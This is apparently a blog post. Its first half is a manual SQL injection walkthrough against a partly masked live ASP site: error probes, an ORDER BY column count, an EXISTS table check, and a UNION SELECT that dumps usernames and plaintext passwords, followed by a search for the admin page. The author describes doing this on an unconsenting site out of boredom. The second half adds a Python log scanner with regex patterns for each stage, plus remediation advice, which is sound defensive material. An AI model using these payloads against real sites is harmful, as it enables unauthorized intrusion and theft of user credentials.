...gong.com/about.asp?dd=613' //error
Next
...gong.com/about.asp?dd=613 and 1=1 //normal
...gong.com/about.asp?dd=613 and 1=2 //error
An injection point
...gong.com/about.asp?dd=613 order by 1 //normal
...gong.com/about.asp?dd=613 order by 19 //normal
...gong.com/about.asp?dd=613 order by 20 //error
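Now to guess the table name (unfortunately I could not guess it, so I got it by running a tool)
...gong.com/about.asp?dd=613 and exists(select * from userinfo) //normal, which shows that this table exists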
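Next, guess the fields
..gong.com/about.asp?dd=613 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from userinfo //two numbers appear on the page: 13 and 17
Then replace 13 and 17 with the guessed fields
..gong.com/about.asp?dd=613 union select 1,2,3,4,5,6,7,8,9,10,11,12,username,14,15,16,password,18,19 from userinfo
The username and password were dumped; the password is 7 characters long, with no MD5 encryption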
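Now it is just a matter of finding the admin login
I guessed a few admin addresses and none of them were right, so I ran a tool instead
..gong.com/conn.asp //200
I opened it and the page was blank; someone has probably already been at it. This manual injection, done out of boredom and as a bit of review, ends here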
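
Seen from the server side, the steps above leave a recognizable trail in the web log. The following is an added example, not part of the original post, that flags a client walking through those stages and lists the paths whose status code flipped between probes. The log format, IP addresses, status codes and the `news.asp` line are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Constructed sample in an assumed "client-ip method target status" format (IPs and statuses made up).
SAMPLE_LOG = """\
203.0.113.7 GET /about.asp?dd=613' 500
203.0.113.7 GET /about.asp?dd=613+and+1=1 200
203.0.113.7 GET /about.asp?dd=613+and+1=2 500
203.0.113.7 GET /about.asp?dd=613+order+by+19 200
203.0.113.7 GET /about.asp?dd=613+order+by+20 500
203.0.113.7 GET /about.asp?dd=613+and+exists(select+*+from+userinfo) 200
203.0.113.7 GET /about.asp?dd=613+union+select+1,2,3+from+userinfo 200
198.51.100.4 GET /news.asp?title=order+by+phone 200
"""

# One pattern per stage of the walkthrough, matched on the decoded query string.
STAGES = [
    ("quote_probe", re.compile(r"=\s*\d+\s*['\"]")),
    ("boolean_test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order_by_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("exists_probe", re.compile(r"\bexists\s*\(\s*select\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

def classify(query):
    """Return the names of the probe stages whose pattern appears in a query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(log_text, min_stages=3):
    """Flag clients that hit several distinct stages; list paths whose status flipped."""
    stages = defaultdict(set)    # ip -> stage names seen
    statuses = defaultdict(set)  # (ip, path) -> status codes returned to probe requests
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or "?" not in parts[2]:
            continue
        ip, (path, query), status = parts[0], parts[2].split("?", 1), parts[3]
        hits = classify(query)
        if hits:
            stages[ip].update(hits)
            statuses[(ip, path)].add(status)
    report = {}
    for ip, names in stages.items():
        if len(names) >= min_stages:
            flipped = sorted(p for (i, p), s in statuses.items() if i == ip and len(s) > 1)
            report[ip] = {"stages": sorted(names), "oracle_paths": flipped}
    return report
```

Detection like this complements the fix rather than replacing it: a numeric parameter such as `dd` should be validated as an integer and bound as a query parameter, and passwords should not be stored in plaintext.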
Time: 2024-11-08 22:02:44